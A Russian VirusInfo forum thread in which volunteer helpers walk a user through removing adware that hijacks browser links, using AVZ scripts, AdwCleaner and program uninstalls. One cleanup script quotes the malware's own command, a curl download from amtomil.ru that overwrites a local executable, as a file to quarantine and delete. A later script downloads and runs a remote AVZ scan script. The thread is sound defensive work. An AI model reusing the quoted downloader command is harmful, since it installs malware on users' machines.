Показано с 1 по 11 из 11.

Открывается реклама в браузере (заявка № 215996)

  1. #1
    Junior Member Репутация
    Регистрация
    28.10.2017
    Сообщений
    8
    Вес репутации
    30

    Thumbs up Открывается реклама в браузере

    Здравствуйте. Для начала хочу сказать огромное спасибо вашему форуму и в особенности ребятам, которые абсолютно безвозмездно помогают устранять те проблемы, с которыми не могут справиться суровые антивирусные гиганты. Спасибо!

    Теперь о проблемах. В браузере при нажатии на какую-либо ссылку, в текущей вкладке открывается сторонняя реклама, при этом нужная ссылка открывается в другой вкладке.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    384
    Уважаемый(ая) Slyfus, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,580
    Вес репутации
    763
    Здравствуйте!

    - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

    Деинсталируйте
    Код:
    IObit Uninstaller [20161207]-->"C:\Program Files (x86)\IObit\IObit Uninstaller\unins000.exe"
    setupsk [2017/08/17 18:01:07]-->C:\Users\IT-EXP\AppData\Roaming\setupsk\uninstall.exe
    Закройте все программы

    Отключите
    - ПК от интернета/локалки.
    - Антивирус и Файрвол

    Выполните скрипт в АВЗ -

    Код:
    begin
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
     ClearQuarantineEx(true);
     QuarantineFileF('C:\Users\IT-EXP\AppData\Local\Kometa\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
     QuarantineFile('C:\Users\IT-EXP\AppData\Local\Kometa\StartButton\kometastartvx64.exe', '');
     QuarantineFile('C:\Users\IT-EXP\AppData\Roaming\curl\curl.exe', '');
     QuarantineFile('C:\Users\IT-EXP\AppData\Roaming\curl\curl_7_54.exe  -f -L http://amtomil.ru/f.exe -o C:\Users\IT-EXP\AppData\Roaming\curl\curl.exe', '');
     QuarantineFile('C:\Users\IT-EXP\AppData\Roaming\curl\curl_7_54.exe', '');
     QuarantineFile('C:\Users\IT-EXP\AppData\Roaming\Microsoft\msi.exe', '');
     QuarantineFileF('c:\users\it-exp\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0);
     DeleteFile('C:\Users\IT-EXP\AppData\Local\Kometa\StartButton\kometastartvx64.exe', '32');
     DeleteFile('C:\Users\IT-EXP\AppData\Roaming\curl\curl.exe', '32');
     DeleteFile('C:\Users\IT-EXP\AppData\Roaming\curl\curl_7_54.exe  -f -L http://amtomil.ru/f.exe -o C:\Users\IT-EXP\AppData\Roaming\curl\curl.exe', '32');
     DeleteFile('C:\Users\IT-EXP\AppData\Roaming\curl\curl_7_54.exe', '32');
     DeleteFile('C:\Users\IT-EXP\AppData\Roaming\Microsoft\msi.exe', '32');
     ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
     DeleteFileMask('c:\users\it-exp\appdata\roaming\curl', '*', true);
     DeleteDirectory('c:\users\it-exp\appdata\roaming\curl');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteWizard('SCU', 2, 3, true);
    RebootWindows(true);
    end.
    После выполнения скрипта компьютер перезагрузится.

    Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

    - Сделайте повторные логи по правилам. Для повторной диагностики запустите снова Autologger.

    • Скачайте AdwCleaner и сохраните его на Рабочем столе.
    • Запустите его (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
    • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[S0].txt.
    • Прикрепите отчет к своему следующему сообщению.

  5. #4
    Junior Member Репутация
    Регистрация
    28.10.2017
    Сообщений
    8
    Вес репутации
    30
    Спасибо за помощь. Реклама все еще появляется, но не вся. Та реклама, которая не появляется, просто закрывает вкладки, не открывая новых.

    Деинсталируйте
    setupsk [2017/08/17 18:01:07]-->C:\Users\IT-EXP\AppData\Roaming\setupsk\uninstall.exe
    Данной папки не оказалось.
    Вложения Вложения

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,580
    Вес репутации
    763
    Цитата Сообщение от Slyfus Посмотреть сообщение
    Данной папки не оказалось.
    нужно не папку, а через панель управления - установка удаление программ. Зайти и деинсталировать программу.

    1) Деинсталируйте
    Код:
    Advanced SystemCare 10 [20161207]-->"C:\Program Files (x86)\IObit\Advanced SystemCare\unins000.exe"
    DriverFinder [2017/09/17 10:01:19]-->C:\Program Files (x86)\DriverFinder\uninstall.exe
    IObit Uninstaller [20161207]-->"C:\Program Files (x86)\IObit\IObit Uninstaller\unins000.exe"
    setupsk [2017/08/17 18:01:07]-->C:\Users\IT-EXP\AppData\Roaming\setupsk\uninstall.exe
    2) Только после этого

    • Запустите повторно AdwCleaner (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора).
    • В меню Tools ->Options (Инструменты ->Настройки) отметьте:
      • Сброс политик IE
      • Сброс политик Chrome
    • Нажмите кнопку "Scan" ("Сканировать"), а по окончанию сканирования нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления.
    • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt.
    • Прикрепите отчет к своему следующему сообщению

    Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

  7. #6
    Junior Member Репутация
    Регистрация
    28.10.2017
    Сообщений
    8
    Вес репутации
    30
    Программы деинсталлировал, AdwCleaner'ом очистил со сбросом политик. Проблема осталась.
    Вложения Вложения

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,580
    Вес репутации
    763
    • Пожалуйста, запустите adwcleaner.exe
    • Нажмите File (Файл) Uninstall (Деинсталлировать).
    • Подтвердите удаление нажав кнопку: Да.


    скачайте отсюда Оперу и проверьте проблему в ней.

  9. #8
    Junior Member Репутация
    Регистрация
    28.10.2017
    Сообщений
    8
    Вес репутации
    30
    Спасибо за помощь, проблема решилась после установки Kaspersky Endpoint Security и полной проверки системы. К сожалению, последнюю рекомендацию я выполнить не успел, но могу скинуть логи автологера или adwcleaner'а, если это необходимо.

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.08.2010
    Сообщений
    25,580
    Вес репутации
    763
    Если проблемы больше нет, то не надо. Но предположительно проблема у вас была из-за левых расширений в браузере. Проверка работы в портативном браузера как раз должна была подтвердить или опровергнуть это предположение. Если что обращайтесь .

    + Выполните скрипт в AVZ при наличии доступа в интернет:

    Код:
    var
    LogPath : string;
    ScriptPath : string;
    
    begin
     LogPath := GetAVZDirectory + 'log\avz_log.txt';
     if FileExists(LogPath) Then DeleteFile(LogPath);
     ScriptPath := GetAVZDirectory +'ScanVuln.txt';
    
      if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
        if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
           ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
           exit;
          end;
      end;
     if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
    end.
    После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.

  11. #10
    Junior Member Репутация
    Регистрация
    28.10.2017
    Сообщений
    8
    Вес репутации
    30
    Выполнил скрипт, уязвимости не найдены. Будем надеяться, что так и есть. Еще раз спасибо огромное за помощь

  12. #11
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    983

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 0
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) Slyfus, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 2
      Последнее сообщение: 05.08.2017, 08:51
    2. Открывается реклама в браузере
      От amelie в разделе Помогите!
      Ответов: 14
      Последнее сообщение: 09.05.2017, 22:23
    3. Открывается в браузере реклама.
      От dimonbasiak в разделе Помогите!
      Ответов: 15
      Последнее сообщение: 18.04.2017, 18:04
    4. Ответов: 2
      Последнее сообщение: 21.02.2014, 11:20
    5. в браузере открывается реклама
      От Летта Ю в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 21.03.2013, 20:17

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01066 seconds with 19 queries